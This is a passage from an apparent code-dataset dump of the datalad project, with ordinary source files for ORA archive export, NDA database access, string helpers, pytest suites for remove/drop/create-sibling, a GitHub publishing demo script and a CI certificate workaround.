metavar=\"FILTERS\",\n doc=\"\"\"git-annex-preferred-content expression for\n git-annex find to filter files. Should start with\n 'or' or 'and' when used in combination with `--for`\"\"\"),\n froms=Parameter(\n args=(\"--from\",),\n dest=\"froms\",\n metavar=\"FROM\",\n nargs=\"+\",\n doc=\"\"\"one or multiple tree-ish from which to select files\"\"\"),\n opts=Parameter(\n args=(\"opts\",),\n nargs=REMAINDER,\n metavar=\"...\",\n doc=\"\"\"list of options for 7z to replace the default '-mx0' to\n generate an uncompressed archive\"\"\"),\n missing_content=Parameter(\n args=(\"--missing-content\",),\n doc=\"\"\"By default, any discovered file with missing content will\n result in an error and the export is aborted. 
Setting this to\n 'continue' will issue warnings instead of failing on error. The\n value 'ignore' will only inform about problem at the 'debug' log\n level. The latter two can be helpful when generating a TAR archive\n from a dataset where some file content is not available\n locally.\"\"\",\n constraints=EnsureChoice(\"error\", \"continue\", \"ignore\")),\n )\n\n @staticmethod\n @datasetmethod(name='export_archive_ora')\n @eval_results\n def __call__(\n target,\n opts=None,\n *, # opts is positional but optional in CLI\n dataset=None,\n remote=None,\n annex_wanted=None,\n froms=None,\n missing_content='error',):\n # only non-bare repos have hashdirmixed, so require one\n ds = require_dataset(\n dataset, check_installed=True, purpose='export to ORA archive')\n ds_repo = ds.repo\n\n annex_objs = ds_repo.dot_git / 'annex' / 'objects'\n\n archive = resolve_path(target, dataset)\n if archive.is_dir():\n archive = archive / 'archive.7z'\n else:\n archive.parent.mkdir(exist_ok=True, parents=True)\n\n froms = ensure_list(froms)\n\n if not opts:\n # uncompressed by default\n opts = ['-mx0']\n\n res_kwargs = dict(\n action=\"export-archive-ora\",\n logger=lgr,\n )\n\n if not annex_objs.is_dir():\n yield get_status_dict(\n ds=ds,\n status='notneeded',\n message='no annex keys present',\n **res_kwargs,\n )\n return\n\n exportdir = ds_repo.dot_git / 'datalad' / 'tmp' / 'ora_archive'\n if exportdir.exists():\n yield get_status_dict(\n ds=ds,\n status='error',\n message=(\n 'export directory already exists, please remove first: %s',\n str(exportdir)),\n **res_kwargs,\n )\n return\n\n def expr_to_opts(expr):\n opts = []\n expr = expr.replace('(', ' ( ').replace(')', ' ) ')\n for sub_expr in expr.split(' '):\n if len(sub_expr):\n if sub_expr in '()':\n opts.append(f\"-{sub_expr}\")\n else:\n opts.append(f\"--{sub_expr}\")\n return opts\n\n find_filters = []\n if remote:\n find_filters = ['-('] + expr_to_opts(ds_repo.get_preferred_content('wanted', remote)) + ['-)']\n if annex_wanted:\n find_filters.extend(expr_to_opts(annex_wanted))\n # git-annex find results need to be uniqued with set, as git-annex find\n # will return duplicates if multiple symlinks point to the same key.\n #\n # TODO: use --json which was already added, checked with 10.20230407+git131-gb90c2156a6\n if froms:\n keypaths = set([\n annex_objs.joinpath(k) for treeish in froms for k in ds_repo.call_annex_items_([\n 'find', *find_filters, f\"--branch={treeish}\",\n \"--format=${hashdirmixed}${key}/${key}\\\\n\"])\n ])\n else:\n keypaths = set(annex_objs.joinpath(k) for k in ds_repo.call_annex_items_([\n 'find', *find_filters,\n \"--format=${hashdirmixed}${key}/${key}\\\\n\"\n ]))\n\n log_progress(\n lgr.info,\n 'oraarchiveexport',\n 'Start ORA archive export %s', ds,\n total=len(keypaths),\n label='ORA archive export',\n unit=' Keys',\n )\n\n if missing_content == 'continue':\n missing_file_lgr_func = lgr.warning\n elif missing_content == 'ignore':\n missing_file_lgr_func = lgr.debug\n\n link_fx = os.link\n for keypath in keypaths:\n key = keypath.name\n hashdir = op.join(keypath.parts[-4], keypath.parts[-3])\n log_progress(\n lgr.info,\n 'oraarchiveexport',\n 'Export key %s to %s', key, hashdir,\n update=1,\n increment=True)\n keydir = exportdir / hashdir / key\n keydir.mkdir(parents=True, exist_ok=True)\n try:\n link_fx(str(keypath), str(keydir / key))\n except FileNotFoundError as e:\n if missing_content == 'error':\n raise IOError('Key %s has no content available' % keypath)\n missing_file_lgr_func(\n 'Key %s has no content 
available',\n str(keypath))\n except OSError:\n lgr.warning(\n 'No hard links supported at %s, will copy files instead',\n str(keypath))\n # no hard links supported\n # switch function after first error\n link_fx = shutil.copyfile\n link_fx(str(keypath), str(keydir / key))\n\n log_progress(\n lgr.info,\n 'oraarchiveexport',\n 'Finished RIA archive export from %s', ds\n )\n try:\n subprocess.run(\n ['7z', 'u', str(archive), '.'] + opts,\n cwd=str(exportdir),\n )\n yield get_status_dict(\n path=str(archive),\n type='file',\n status='ok',\n **res_kwargs)\n except Exception as e:\n ce = CapturedException(e)\n yield get_status_dict(\n path=str(archive),\n type='file',\n status='error',\n message=('7z failed: %s', ce),\n exception=ce,\n **res_kwargs)\n return\n finally:\n rmtree(str(exportdir))\n" }, { "alpha_fraction": 0.6035451889038086, "alphanum_fraction": 0.6182447075843811, "avg_line_length": 32.0428581237793, "blob_id": "dc39918489dbad2abe63bfc60e4b2d8949a6a378", "content_id": "f23c1459c4ddbefd7b3afb124dfaf974a47a87fb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2313, "license_type": "permissive", "max_line_length": 89, "num_lines": 70, "path": "/datalad/support/nda_.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Various supporting utilities to interface with NIMH Data Archive (NDA)\n\nPrimary \"ugliness\" is the requirement of the cx_Oracle (itself is open, but relies\non closed SDK/libraries) module to access miNDAR database.\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad import cfg\nfrom datalad.downloaders.providers import Providers\n\nfrom logging import getLogger\nlgr = getLogger('datalad.support.nda')\n\nDEFAULT_SERVER = 'mindarvpc.cqahbwk3l1mb.us-east-1.rds.amazonaws.com'\n\nfrom collections import namedtuple\n\n# Could be extracted from the dictionary\n# https://ndar.nih.gov/api/datadictionary/v2/datastructure/image03\n# where type is File\nimage03_file_fields = [\n 'image_file',\n 'data_file2'\n]\nimage03_fields = [\n 'collection_id',\n 'submission_id',\n 'dataset_id',\n 'experiment_id',\n # 'subjectkey',\n # 'src_subject_id',\n] + image03_file_fields\n\nimage03_Record = namedtuple('image03_Record', image03_fields)\n\n\ndef get_oracle_db(\n dbserver=None,\n port=1521,\n sid='ORCL',\n credential=None):\n dbserver = dbserver or cfg.obtain('datalad.externals.nda.dbserver',\n default=DEFAULT_SERVER)\n # This specific username has access to the 'Image' selection of NDA as of about today\n #username = username \\\n # or cfg.get('externals:nda', 'username',\n # default='halchenkoy_103924')\n if not credential:\n providers = Providers.from_config_files()\n credential = providers.get_provider(DEFAULT_SERVER).credential\n\n if not isinstance(credential, dict):\n credential = credential()\n\n import cx_Oracle # you must have the beast if you want to access the dark side\n dsnStr = cx_Oracle.makedsn(dbserver, port, sid)\n db = cx_Oracle.connect(user=credential['user'],\n password=credential['password'],\n dsn=dsnStr)\n\n return db\n" }, { "alpha_fraction": 0.5292066335678101, 
"alphanum_fraction": 0.5366172790527344, "avg_line_length": 32.246376037597656, "blob_id": "5a1df94f35cbd8701cd2906296a5c5b1501e4f99", "content_id": "47269f85cde12feca260813a1f5f84f06730736d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2294, "license_type": "permissive", "max_line_length": 118, "num_lines": 69, "path": "/datalad/support/strings.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##g\n\"\"\"Variety of helpers to deal with strings\"\"\"\n\nfrom __future__ import annotations\n\n__docformat__ = 'restructuredtext'\nimport re\nfrom typing import AnyStr\n\n\ndef get_replacement_dict(rules: AnyStr | list[AnyStr | list[AnyStr] | tuple[AnyStr, AnyStr]]) -> dict[AnyStr, AnyStr]:\n \"\"\"Given a string with replacement rules, produces a dict of from: to\"\"\"\n\n if isinstance(rules, (bytes, str)):\n rules = [rules]\n\n pairs = dict()\n for rule in rules:\n if isinstance(rule, (list, tuple)):\n if len(rule) == 2:\n pairs[rule[0]] = rule[1]\n else:\n raise ValueError(\"Got a rule %s which is not a string or a pair of values (from, to)\"\n % repr(rule))\n elif len(rule) <= 2:\n raise ValueError(\"\")\n else:\n rule_split = rule[1:].split(rule[0:1])\n if len(rule_split) != 2:\n raise ValueError(\n \"Rename string must be of format '/pat1/replacement', \"\n \"where / is an arbitrary character to decide replacement. 
\"\n \"Got %r when trying to separate %r\" % (rule_split, rule)\n )\n pairs[rule_split[0]] = rule_split[1]\n return pairs\n\n\ndef apply_replacement_rules(rules: AnyStr | list[AnyStr | list[AnyStr] | tuple[AnyStr, AnyStr]], s: AnyStr) -> AnyStr:\n r\"\"\"Apply replacement rules specified as a single string\n\n Examples\n --------\n\n >>> apply_replacement_rules(r'/my_(.*)\\.dat/your_\\1.dat.gz', 'd/my_pony.dat')\n 'd/your_pony.dat.gz'\n\n Parameters\n ----------\n rules : str, list of str\n Rules of the format '/pat1/replacement', where / is an arbitrary\n character to decide replacement.\n\n Returns\n -------\n str\n \"\"\"\n\n for regexp, replacement in get_replacement_dict(rules).items():\n s = re.sub(regexp, replacement, s)\n\n return s\n" }, { "alpha_fraction": 0.6330274939537048, "alphanum_fraction": 0.6330274939537048, "avg_line_length": 27.4761905670166, "blob_id": "5e6ccd3439d238c0cacd36c63e081ce49e922d06", "content_id": "044647458f781ce14e27ca974b5aab9ad5f702ca", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1199, "license_type": "permissive", "max_line_length": 73, "num_lines": 42, "path": "/datalad/cli/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import sys\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad.tests.utils_pytest import (\n eq_,\n ok_,\n)\nfrom datalad.utils import (\n swallow_logs,\n swallow_outputs,\n)\n\nfrom ..utils import setup_exceptionhook\n\n\[email protected](\"interactive\", [True, False])\ndef test_setup_exceptionhook(interactive):\n old_exceptionhook = sys.excepthook\n\n post_mortem_tb = []\n\n def our_post_mortem(tb):\n post_mortem_tb.append(tb)\n\n with patch('sys.excepthook'), \\\n patch('datalad.utils.is_interactive', lambda: interactive), \\\n patch('pdb.post_mortem', our_post_mortem):\n setup_exceptionhook()\n our_exceptionhook = sys.excepthook\n ok_(old_exceptionhook != our_exceptionhook)\n with swallow_logs() as cml, swallow_outputs() as cmo:\n # we need to call our_exceptionhook explicitly b/c nose\n # swallows all Exceptions and hook never gets executed\n try:\n raise RuntimeError\n except Exception as e: # RuntimeError:\n type_, value_, tb_ = sys.exc_info()\n our_exceptionhook(type_, value_, tb_)\n\n eq_(old_exceptionhook, sys.excepthook)\n\n\n\n" }, { "alpha_fraction": 0.6142985224723816, "alphanum_fraction": 0.617679238319397, "avg_line_length": 34.041812896728516, "blob_id": "77e8398e992a87f1fface58e43b3b7ada2ff1231", "content_id": "c9a7c16bdca54f3f66234d011f99253df12e41ee", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10057, "license_type": "permissive", "max_line_length": 82, "num_lines": 287, "path": "/datalad/local/tests/test_remove.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test remove command\"\"\"\n\nimport os.path as op\n\nfrom datalad.api import (\n clone,\n remove,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_in_results,\n assert_not_in,\n 
assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n get_deeply_nested_structure,\n nok_,\n ok_,\n with_tempfile,\n with_tree,\n)\n\n\n@with_tempfile\ndef test_remove(path=None):\n # see docstring for test data structure\n ds = get_deeply_nested_structure(path)\n gitfile = op.join(\"subdir\", \"git_file.txt\")\n\n ok_((ds.pathobj / gitfile).exists())\n res = ds.remove(gitfile, drop='all')\n assert_result_count(res, 3)\n # git file needs no dropping\n assert_in_results(\n res,\n action='drop',\n path=str(ds.pathobj / gitfile),\n status='notneeded',\n type='file',\n )\n # removed from working tree\n assert_in_results(\n res,\n action='remove',\n path=str(ds.pathobj / gitfile),\n status='ok',\n type='file',\n )\n # saved removal in dataset\n assert_in_results(\n res,\n action='save',\n path=ds.path,\n type='dataset',\n status='ok',\n )\n nok_((ds.pathobj / gitfile).exists())\n\n # now same for an annexed files\n annexedfile = op.join(\"subdir\", \"annexed_file.txt\")\n # drop failure prevents removal\n res = ds.remove(annexedfile, drop='all', on_failure='ignore')\n assert_result_count(res, 1)\n assert_in_results(res, status='error', action='drop',\n path=str(ds.pathobj / annexedfile))\n ok_((ds.pathobj / annexedfile).exists())\n\n # now remove the file, but actually not drop the underlying\n # key -- hence no availability loss -- default mode of operation\n # remember the key\n key = ds.repo.get_file_annexinfo(annexedfile)['key']\n res = ds.remove(annexedfile, drop='datasets',\n message=\"custom msg\",\n on_failure='ignore')\n # removal and dataset save\n assert_result_count(res, 2)\n eq_(\n ds.repo.format_commit(\n \"%B\",\n ds.repo.get_corresponding_branch()).rstrip(),\n \"custom msg\")\n assert_in_results(res, action='remove', status='ok',\n path=str(ds.pathobj / annexedfile))\n assert_not_in_results(res, action='drop')\n nok_((ds.pathobj / annexedfile).exists())\n res = ds.repo.call_annex_records(['whereis', '--key', key, '--json'])\n assert_in_results(res, key=key, success=True)\n\n # now remove entire directory\n res = ds.remove('subdir', on_failure='ignore')\n assert_in_results(res, status='impossible', state='untracked')\n ok_((ds.pathobj / 'subdir').exists())\n\n ds.save('subdir')\n res = ds.remove('subdir', on_failure='ignore')\n assert_in_results(res, status='ok', action='remove')\n assert_in_results(res, status='ok', action='save', type='dataset')\n nok_((ds.pathobj / 'subdir').exists())\n\n # now remove an entire subdataset\n # prep: make clean\n rmdspath = ds.pathobj / 'subds_modified' / 'subds_lvl1_modified'\n ds.save(rmdspath, recursive=True)\n res = ds.remove(rmdspath, on_failure='ignore')\n # unique dataset, with unique keys -- must fail\n assert_in_results(res, status='error', action='uninstall', path=str(rmdspath))\n\n # go reckless\n assert_in(str(rmdspath),\n ds.subdatasets(path='subds_modified',\n recursive=True,\n result_xfm='paths',\n result_renderer='disabled'))\n res = ds.remove(rmdspath, reckless='availability', on_failure='ignore')\n assert_status('ok', res)\n assert_in_results(res, action='uninstall', path=str(rmdspath))\n assert_in_results(res, action='remove', path=str(rmdspath))\n nok_(rmdspath.exists())\n # properly unlinked\n assert_not_in(str(rmdspath),\n ds.subdatasets(path='subds_modified',\n recursive=True,\n result_xfm='paths',\n result_renderer='disabled'))\n\n # lastly, remove an uninstalled subdataset\n # we save all to be able to check whether removal was committed 
and\n # the ds is clean at the end\n ds.save()\n # uninstall, we don't care about the existing modifications here\n res = ds.drop('subds_modified', what='all',\n reckless='kill', recursive=True)\n # even remove the empty mount-point, such that is is invisible on the\n # file system\n (ds.pathobj / 'subds_modified').rmdir()\n res = ds.remove('subds_modified', on_failure='ignore')\n assert_in_results(\n res, action='remove', path=str(ds.pathobj / 'subds_modified'))\n # removal was committed\n assert_repo_status(ds.path)\n\n # and really finally, removing top-level is just a drop\n res = ds.remove(reckless='kill')\n assert_in_results(res, action='uninstall', path=ds.path, status='ok')\n nok_(ds.is_installed())\n\n\n@with_tempfile\ndef test_remove_subdataset_nomethod(path=None):\n ds = Dataset(path).create()\n ds.create('subds')\n with chpwd(path):\n # fails due to unique state\n res = remove('subds', on_failure='ignore')\n assert_in_results(res, action='uninstall', status='error', type='dataset')\n res = remove('subds', reckless='availability', on_failure='ignore')\n assert_in_results(res, action='uninstall', status='ok', type='dataset')\n assert_in_results(res, action='remove', status='ok')\n assert_in_results(res, action='save', status='ok')\n\n\n@with_tempfile()\ndef test_remove_uninstalled(path=None):\n ds = Dataset(path)\n assert_raises(ValueError, ds.remove)\n\n\n@with_tempfile()\ndef test_remove_nowhining(path=None):\n # when removing a dataset under a dataset (but not a subdataset)\n # should not provide a meaningless message that something was not right\n ds = Dataset(path).create()\n # just install/clone inside of it\n subds_path = ds.pathobj / 'subds'\n clone(path=subds_path, source=path)\n remove(dataset=subds_path) # should remove just fine\n\n\n@with_tempfile()\ndef test_remove_recreation(path=None):\n # test recreation is possible and doesn't conflict with in-memory\n # remainings of the old instances\n # see issue #1311\n ds = Dataset(path).create()\n ds.remove(reckless='availability')\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n ok_(ds.is_installed())\n\n\n@with_tree({'one': 'one', 'two': 'two', 'three': 'three'})\ndef test_remove_more_than_one(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n assert_repo_status(path)\n # ensure #1912 stays resolved\n ds.remove(['one', 'two'], reckless='availability')\n assert_repo_status(path)\n\n\n@with_tempfile()\ndef test_no_interaction_with_untracked_content(path=None):\n # extracted from what was a metadata test originally\n ds = Dataset(op.join(path, 'origin')).create(force=True)\n create_tree(ds.path, {'sub': {'subsub': {'dat': 'lots of data'}}})\n subds = ds.create('sub', force=True)\n subds.remove(op.join('.datalad', 'config'))\n nok_((subds.pathobj / '.datalad' / 'config').exists())\n # this will only work, if `remove` didn't do anything stupid and\n # caused all content to be saved\n subds.create('subsub', force=True)\n\n\n@with_tempfile()\ndef test_kill(path=None):\n # nested datasets with load\n ds = Dataset(path).create()\n (ds.pathobj / 'file.dat').write_text('load')\n ds.save(\"file.dat\")\n subds = ds.create('deep1')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['deep1'])\n assert_repo_status(ds.path)\n\n # and we fail to remove for many reasons\n # - unpushed commits\n # - a subdataset present\n # - unique annex key\n res = ds.remove(on_failure='ignore')\n assert_result_count(\n res, 1,\n status='error', path=ds.path)\n eq_(ds.remove(reckless='availability',\n 
result_xfm='datasets'),\n [subds, ds])\n nok_(ds.pathobj.exists())\n\n\n@with_tempfile()\ndef test_clean_subds_removal(path=None):\n ds = Dataset(path).create()\n subds1 = ds.create('one')\n subds2 = ds.create('two')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['one', 'two'])\n assert_repo_status(ds.path)\n # now kill one\n res = ds.remove('one', reckless='availability', result_xfm=None)\n # subds1 got uninstalled, and ds got the removal of subds1 saved\n assert_result_count(res, 1, path=subds1.path, action='uninstall', status='ok')\n assert_result_count(res, 1, path=subds1.path, action='remove', status='ok')\n assert_result_count(res, 1, path=ds.path, action='save', status='ok')\n ok_(not subds1.is_installed())\n assert_repo_status(ds.path)\n # two must remain\n eq_(ds.subdatasets(result_xfm='relpaths'), ['two'])\n # one is gone\n nok_(subds1.pathobj.exists())\n # and now again, but this time remove something that is not installed\n ds.create('three')\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['three', 'two'])\n ds.drop('two', what='all', reckless='availability')\n assert_repo_status(ds.path)\n eq_(sorted(ds.subdatasets(result_xfm='relpaths')), ['three', 'two'])\n nok_(subds2.is_installed())\n # oderly empty mountpoint is maintained\n ok_(subds2.pathobj.exists())\n res = ds.remove('two', reckless='availability')\n assert_in_results(\n res,\n path=str(ds.pathobj / 'two'),\n action='remove')\n assert_repo_status(ds.path)\n # subds2 was already uninstalled, now ds got the removal of subds2 saved\n nok_(subds2.pathobj.exists())\n eq_(ds.subdatasets(result_xfm='relpaths'), ['three'])\n" }, { "alpha_fraction": 0.7673282623291016, "alphanum_fraction": 0.770076334476471, "avg_line_length": 67.22916412353516, "blob_id": "e4ee217955126efbd7cc9b91df9117b1c61a95ba", "content_id": "e8e93939640e8c85f0f75b8c363ce7ac0bc1e8da", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3275, "license_type": "permissive", "max_line_length": 412, "num_lines": 48, "path": "/docs/casts/publish_on_github.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# this cast requires the ability to create 'datalad/publish-demo' on Github (must not exist yet)\n# it also require SSH access to the URL demo.datalad.org (can be localhost)\n\nsay \"Sharing is best done on a platform that many people visit. One of them is GitHub.\"\nsay \"However, Git is not designed to handle large data files directly, and GitHub will refuse large files\"\nsay \"One can either use GitHub's own LFS tool ... or use DataLad to flexibly combine many possible data hosting solutions with a repository hosted on GitHub\"\nsay \"Here is how this looks...\"\n\nsay \"It starts with a dataset. We give it a description to more easily keep track of where data are.\"\nrun \"datalad create demo --description \\\"original dataset location\\\"\"\nrun \"cd demo\"\n\nsay \"For this demo, we are generating a large (600MB file) comprised of random data. A file of this size cannot be hosted on GitHub directly.\"\nrun \"datalad run dd if=/dev/urandom of=big.dat bs=1M count=600\"\n\nsay \"Publishing this dataset in a way that allows anyone to simply install it from GitHub, AND get the big data file, requires two steps\"\nsay \"1. Host the data file at some publicly accessible location\"\nsay \"2. 
Configure DataLad to make sure that getting data from GitHub transparently requests from this other location instead\"\n\nsay \"Here we use a personal webserver with SSH access, but, in principle, any hosting solution supported by git-annex is equally suitable\"\nsay \"We create a remote sibling of our dataset under the name 'myserver' via SSH, and tell datalad to track it as a common data source that is available for any future installation of this dataset. Access to this location will happen via the given http:// URL, and --ui true tells to install DataLad web UI as on https://datasets.datalad.org. Note that /.git in the URL most likely to be necessary in your case.\"\nrun \"datalad create-sibling -s myserver demo.datalad.org:public_html/publish-demo --ui true --as-common-datasrc demo-server --target-url http://demo.datalad.org/publish-demo/.git\"\n\nsay \"With this configuration in place, we can now create a repository on GitHub, and configure the remote sibling on the SSH server as a publication dependency\"\nrun \"datalad create-sibling-github --github-organization datalad --publish-depends myserver --access-protocol ssh publish-demo\"\n\nsay \"Let's quickly recap that the data file is just in our local dataset\"\nrun \"git annex whereis\"\n\nsay \"From now on, we can simply 'publish to GitHub' and DataLad will take care of the rest\"\nrun \"datalad publish --to github --transfer-data all\"\n\nsay \"We can confirm that our data file ended up on our server\"\nrun \"git annex whereis big.dat\"\n\nsay \"Now we simulate how it would look for a random person to obtain the data in this dataset from GitHub -- by installing into a new location, straight from GitHub (this does not require a GitHub account)\"\nrun \"cd ../\"\nrun \"datalad install -s [email protected]:datalad/publish-demo.git fromgh\"\nrun \"cd fromgh\"\n\nsay \"This dataset does not know how to access the original dataset location, only GitHub and our server\"\nrun \"git remote -v\"\n\nsay \"There is no further setup necessary, anyone can get the data -- if they have permission to access the URL of our own server\"\nrun \"datalad get big.dat\"\nrun \"ls -sLh big.dat\"\n\nsay \"Go publish!\"\n" }, { "alpha_fraction": 0.5754716992378235, "alphanum_fraction": 0.5786163806915283, "avg_line_length": 31.89655113220215, "blob_id": "0e9bd3502cd1a3d48b732876a59c80b5e78c0fd1", "content_id": "ca4fcd9e3b009e7180947170e15c66a5a7110d8a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 954, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/datalad/distribution/tests/test_drop.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test drop command\n\"\"\"\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import IncompleteResultsError\nfrom datalad.tests.utils_pytest import (\n assert_in,\n assert_raises,\n assert_status,\n with_tree,\n)\n\n\n@with_tree({\"foo\": \"foo\"})\ndef test_drop_file_need_nocheck(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n with assert_raises(IncompleteResultsError) as cme:\n ds.drop(\"foo\")\n # The --force suggestion from 
git-annex-drop is translated to --reckless.\n assert_in(\"--reckless\", str(cme.value))\n assert_status(\"ok\", ds.drop(\"foo\", reckless='kill', on_failure=\"ignore\"))\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7099999785423279, "avg_line_length": 32.33333206176758, "blob_id": "484905b2da179a1e9a63336f0e74443c242b8714", "content_id": "64a739fc8b91c6a8bdd27cb121cccb508760cbe0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 300, "license_type": "permissive", "max_line_length": 86, "num_lines": 9, "path": "/tools/ci/debians_disable_outdated_ssl_cert", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# \"Recipe\" from https://superuser.com/a/1679332 (thanks @jwodder)\n# to mitigate https://github.com/datalad/datalad/issues/6026\n\nif hash update-ca-certificates; then\n sudo sed -i -e 's,^\\(mozilla/DST_Root_CA_X3.crt\\),!\\1,g' /etc/ca-certificates.conf\n sudo update-ca-certificates\nfi\n" }, { "alpha_fraction": 0.6184271574020386, "alphanum_fraction": 0.6234973669052124, "avg_line_length": 37.05497741699219, "blob_id": "7f39f5537504d65b564ce2699bb7f1ad7d02886a", "content_id": "02cb13589b7d4f3dd7dde690f50094b94b8bf591", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36685, "license_type": "permissive", "max_line_length": 117, "num_lines": 964, "path": "/datalad/distribution/tests/test_create_sibling.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target ssh web server action\n\n\"\"\"\n\nimport logging\nimport os\nimport stat\nimport sys\nfrom os import chmod\nfrom os.path import (\n basename,\n exists,\n)\nfrom os.path import join as opj\n\nimport pytest\n\nfrom datalad.api import (\n create_sibling,\n install,\n push,\n)\nfrom datalad.cmd import StdOutErrCapture\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.distribution.create_sibling import _RunnerAdapter\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n CommandError,\n InsufficientArgumentsError,\n)\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import urlquote\nfrom datalad.tests.utils_testdatasets import _mk_submodule_annex\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_dict_equal,\n assert_false,\n assert_in,\n assert_in_results,\n assert_no_errors_logged,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n get_mtimes_and_digests,\n get_ssh_port,\n known_failure_windows,\n ok_,\n ok_endswith,\n ok_file_has_content,\n ok_file_under_git,\n skip_if_on_windows,\n skip_if_root,\n skip_ssh,\n slow,\n swallow_logs,\n with_tempfile,\n with_testsui,\n)\nfrom datalad.utils import (\n Path,\n _path_,\n chpwd,\n on_windows,\n)\n\nfrom ..dataset import Dataset\n\nlgr = logging.getLogger('datalad.tests')\n\n\n_have_webui = None\n\n\ndef have_webui():\n \"\"\"Helper for a delayed import test to break circular imports from\n deprecated extension, which gets its 
tests from the module too\n \"\"\"\n global _have_webui\n if _have_webui is not None:\n return _have_webui\n\n try:\n import datalad_deprecated.sibling_webui\n from datalad_deprecated.tests.test_create_sibling_webui import (\n assert_publish_with_ui,\n )\n _have_webui = True\n except (ModuleNotFoundError, ImportError):\n _have_webui = False\n return _have_webui\n\n\nif lgr.getEffectiveLevel() > logging.DEBUG:\n assert_create_sshwebserver = assert_no_errors_logged(create_sibling)\nelse:\n assert_create_sshwebserver = create_sibling\n\n\ndef assert_postupdate_hooks(path, installed=True, flat=False):\n \"\"\"\n Verify that post-update hook was installed (or not, if installed=False)\n \"\"\"\n from glob import glob\n if flat:\n # there is no top level dataset\n datasets = glob(opj(path, '*'))\n else:\n ds = Dataset(path)\n datasets = [ds.path] + ds.subdatasets(result_xfm='paths', recursive=True, state='present')\n for ds_ in datasets:\n ds_ = Dataset(ds_)\n hook_path = opj(ds_.path, '.git', 'hooks', 'post-update')\n if installed:\n ok_(os.path.exists(hook_path),\n msg=\"Missing %s\" % hook_path)\n else:\n ok_(not os.path.exists(hook_path),\n msg=\"%s exists when it shouldn't\" % hook_path)\n\n\n@with_tempfile(mkdir=True)\ndef test_invalid_call(path=None):\n with chpwd(path):\n # ^ Change directory so that we don't fail with an\n # InvalidGitRepositoryError if the test is executed from a git\n # worktree.\n\n # needs a SSH URL\n assert_raises(InsufficientArgumentsError, create_sibling, '')\n assert_raises(ValueError, create_sibling, 'http://ignore.me')\n # needs an actual dataset\n assert_raises(\n ValueError,\n 